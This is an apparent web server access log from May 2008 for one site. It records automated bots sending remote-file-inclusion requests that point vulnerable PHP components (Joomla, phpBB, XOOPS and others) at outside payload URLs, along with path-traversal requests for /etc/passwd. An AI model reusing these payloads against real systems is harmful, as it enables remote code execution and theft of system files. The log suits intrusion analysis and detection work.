202.181.99.12 - - [29/May/2008:12:21:25 -0700] "GET //component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.99.12 - - [29/May/2008:12:21:26 -0700] "GET /logs//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [29/May/2008:12:21:28 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.65.47.4 - - [29/May/2008:12:21:29 -0700] "GET /logs/access.log//index.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.65.47.4 - - [29/May/2008:12:21:33 -0700] "GET //index.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
83.65.47.4 - - [29/May/2008:12:21:34 -0700] "GET /logs//index.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.181.74 - - [29/May/2008:12:21:35 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://tgr-clan.ch/tes? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
207.58.181.74 - - [29/May/2008:12:21:35 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://tgr-clan.ch/tes? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
211.174.62.136 - - [29/May/2008:12:21:36 -0700] "GET /homepage.php?sel=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.47 - - [29/May/2008:12:22:29 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.30.216.91 - - [29/May/2008:12:22:31 -0700] "GET /logs/access_080312.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
201.6.121.78 - - [29/May/2008:12:22:53 -0700] "GET /logs/access_080129.log//index.php?themesdir=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.174.62.136 - - [29/May/2008:12:23:02 -0700] "GET /logs/access_080220.log/homepage.php?sel=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.174.62.136 - - [29/May/2008:12:23:02 -0700] "GET /homepage.php?sel=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.174.62.136 - - [29/May/2008:12:23:02 -0700] "GET /logs/homepage.php?sel=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.180.134.223 - - [29/May/2008:12:23:25 -0700] "GET /logs/access_080201.log/index.php?pagina=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.180.134.223 - - [29/May/2008:12:23:27 -0700] "GET /index.php?pagina=../../../../../../../../../../etc/passwd HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
64.180.134.223 - - [29/May/2008:12:23:27 -0700] "GET /logs/index.php?pagina=../../../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.209.236.71 - - [29/May/2008:12:23:27 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.209.236.71 - - [29/May/2008:12:23:28 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.209.236.71 - - [29/May/2008:12:23:28 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.20.46.121 - - [29/May/2008:12:23:29 -0700] "GET /logs/access_080308.log//component/option,com_sitemap/Itemid,43/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.174.62.136 - - [29/May/2008:12:23:30 -0700] "GET /logs/access_080216.log/homepage.php?sel=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.104.223.2 - - [29/May/2008:12:23:33 -0700] "GET /logs/access_080327.log/modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
206.212.247.135 - - [29/May/2008:12:23:40 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.212.247.135 - - [29/May/2008:12:23:41 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.246.42.59 - - [29/May/2008:12:24:11 -0700] "GET /logs/access_080327.log/newspublish/include.php?path[docroot]=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.112.193.46 - - [29/May/2008:12:24:37 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [29/May/2008:12:24:38 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [29/May/2008:12:24:38 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.99.12 - - [29/May/2008:12:24:52 -0700] "GET /logs/access_080120.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.150.78.76 - - [29/May/2008:12:24:56 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/kelentitmu/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.150.78.76 - - [29/May/2008:12:24:56 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/kelentitmu/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.104.223.2 - - [29/May/2008:12:25:07 -0700] "GET /logs/access_080327.log/modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.188.60.54 - - [29/May/2008:12:25:12 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [29/May/2008:12:25:12 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [29/May/2008:12:25:23 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:12:25:23 -0700] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.6.123.99 - - [29/May/2008:12:25:46 -0700] "GET /logs/access_080418.log//index.phpmain.php?x=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
213.198.106.61 - - [29/May/2008:12:25:52 -0700] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.62.26.18 - - [29/May/2008:12:25:53 -0700] "GET /logs/access_071225.log/newspublish/include.php?path[docroot]=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [29/May/2008:12:25:55 -0700] "GET /newspublish/include.php?path[docroot]=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.26.18 - - [29/May/2008:12:25:55 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.80.134 - - [29/May/2008:12:26:03 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
209.62.80.134 - - [29/May/2008:12:26:03 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://justbarelylegal.com/ct/test.txt? HTTP/1.1" 200 4139 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
85.214.32.233 - - [29/May/2008:12:26:09 -0700] "GET /logs//auth/auth.php?phpbb_root_path=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.32.233 - - [29/May/2008:12:26:09 -0700] "GET //auth/auth.php?phpbb_root_path=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.163.193.212 - - [29/May/2008:12:26:11 -0700] "GET /logs/access.log/index.php?option=com_custompages&cpage=http://www.privatox.altervista.org/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.209.176 - - [29/May/2008:12:26:16 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
87.106.209.176 - - [29/May/2008:12:26:17 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://h1.ripway.com/monjali/test.txt? HTTP/1.1" 200 4139 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
218.163.193.212 - - [29/May/2008:12:26:25 -0700] "GET /index.php?option=com_custompages&cpage=http://www.privatox.altervista.org/idnews.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:12:26:34 -0700] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.188.60.54 - - [29/May/2008:12:26:36 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.163.193.212 - - [29/May/2008:12:26:37 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://www.privatox.altervista.org/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:12:26:40 -0700] "GET /classes/core/language.php?rootdir=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.147.239.5 - - [29/May/2008:12:26:45 -0700] "GET /logs/classes/core/language.php?rootdir=http://ecoles.csbe.qc.ca/cdm/cours_ancien/IID.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
189.1.14.15 - - [29/May/2008:12:26:50 -0700] "GET /logs/access_080118.log/index.php?pag=http://itmovement.com/taxy/templates_nogui/editor/_samples/mod.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.203.150 - - [29/May/2008:12:26:52 -0700] "GET /logs/access_080327.log/modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
189.1.14.15 - - [29/May/2008:12:26:52 -0700] "GET /index.php?pag=http://itmovement.com/taxy/templates_nogui/editor/_samples/mod.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
189.1.14.15 - - [29/May/2008:12:26:54 -0700] "GET /logs/index.php?pag=http://itmovement.com/taxy/templates_nogui/editor/_samples/mod.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.203.150 - - [29/May/2008:12:27:04 -0700] "GET /logs/access_080327.log/modifyform.html?code=http://notengo.hostinggratisargentina.com/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:12:27:10 -0700] "GET /logs/access_080106.log//skin/zero_vote/ask_password.php?dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:12:27:10 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:12:27:11 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.255.59.243 - - [29/May/2008:12:27:16 -0700] "GET /logs/access_080103.log HTTP/1.0" 200 262144 "http://search.eztools.com/administrator/components/com_swmenupro/imagemanager/classes/administrator/components/com_a6mambocredits/admin.a6mambocredits.php/administrator/components/com_swmenupro/imagemanager/classes/imagemanager.php/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Crazy Browser 1.0.5)" "www.dmulk.com"
216.188.60.54 - - [29/May/2008:12:27:32 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.163.197.88 - - [29/May/2008:12:27:41 -0700] "GET /logs/access_080118.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.163.197.88 - - [29/May/2008:12:27:41 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.163.197.88 - - [29/May/2008:12:27:42 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.26.193.246 - - [29/May/2008:12:28:33 -0700] "GET /logs/access_080106.log=http://ninguem.t35.com/pbot.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
201.26.193.246 - - [29/May/2008:12:28:35 -0700] "GET /logs/access_080108.log=http://ninguem.t35.com/pbot.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
201.26.193.246 - - [29/May/2008:12:28:41 -0700] "GET /logs/access_080321.log=http://ninguem.t35.com/pbot.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
201.26.193.246 - - [29/May/2008:12:28:41 -0700] "GET /logs/access_080313.log=http://ninguem.t35.com/pbot.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (compatible; Indy Library)" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:12:29:00 -0700] "GET /logs/access_080118.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:12:29:00 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:12:29:01 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
78.46.70.228 - - [29/May/2008:12:29:40 -0700] "GET /logs/access_080327.log//components/com_extcalendar/admin.config.inc.php?CONFIG_EXT[FS_PATH]=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.99.12 - - [29/May/2008:12:29:41 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.99.12 - - [29/May/2008:12:29:41 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.1.14.15 - - [29/May/2008:12:29:44 -0700] "GET /logs/access_071225.log/index.php?pag=http://itmovement.com/taxy/templates_nogui/editor/_samples/mod.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.26.142.244 - - [29/May/2008:12:29:51 -0700] "GET /logs/access_080217.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.26.142.244 - - [29/May/2008:12:29:53 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
200.26.142.244 - - [29/May/2008:12:29:58 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:12:30:07 -0700] "GET /logs/access.log//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:12:30:07 -0700] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [29/May/2008:12:30:08 -0700] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.25.155.27 - - [29/May/2008:12:31:04 -0700] "GET /logs/access_080220.log/homepage.php?sel=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.25.155.27 - - [29/May/2008:12:31:04 -0700] "GET /homepage.php?sel=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.25.155.27 - - [29/May/2008:12:31:07 -0700] "GET /logs/homepage.php?sel=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.120.241.242 - - [29/May/2008:12:31:38 -0700] "GET /logs/access_080205.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/May/2008:12:31:40 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 200 4139 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/May/2008:12:31:40 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.ispa-pecs-gis.hu/safeon.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
80.80.160.21 - - [29/May/2008:12:31:47 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.80.160.21 - - [29/May/2008:12:31:47 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.80.160.21 - - [29/May/2008:12:31:48 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://infects1337.t35.com/TT??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
201.25.155.27 - - [29/May/2008:12:32:03 -0700] "GET /logs/access_080216.log/homepage.php?sel=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.122.141.75 - - [29/May/2008:12:32:05 -0700] "GET /logs/access_080118.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.141.72 - - [29/May/2008:12:32:05 -0700] "GET /logs/access_080118.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.141.75 - - [29/May/2008:12:32:05 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.141.72 - - [29/May/2008:12:32:06 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.141.75 - - [29/May/2008:12:32:06 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.141.72 - - [29/May/2008:12:32:06 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.150.78.76 - - [29/May/2008:12:32:19 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/kelentitmu/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.150.78.76 - - [29/May/2008:12:32:32 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://h1.ripway.com/kelentitmu/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.10.17.19 - - [29/May/2008:12:32:51 -0700] "GET /logs/access_080205.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://darkfm.com//administrator/components/com_color/off.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.10.17.19 - - [29/May/2008:12:32:53 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://darkfm.com//administrator/components/com_color/off.txt? HTTP/1.1" 200 4139 "-" "libwww-perl/5.808" "www.dmulk.com"
222.122.141.76 - - [29/May/2008:12:32:53 -0700] "GET /logs/access_080118.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.10.17.19 - - [29/May/2008:12:32:53 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://darkfm.com//administrator/components/com_color/off.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
222.122.141.76 - - [29/May/2008:12:32:54 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.122.141.76 - - [29/May/2008:12:32:54 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.163.197.88 - - [29/May/2008:12:32:56 -0700] "GET /logs/access_080207.log//components/com_simpleboard/image_upload.php?sbp=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.163.197.88 - - [29/May/2008:12:32:56 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.163.197.88 - - [29/May/2008:12:32:56 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
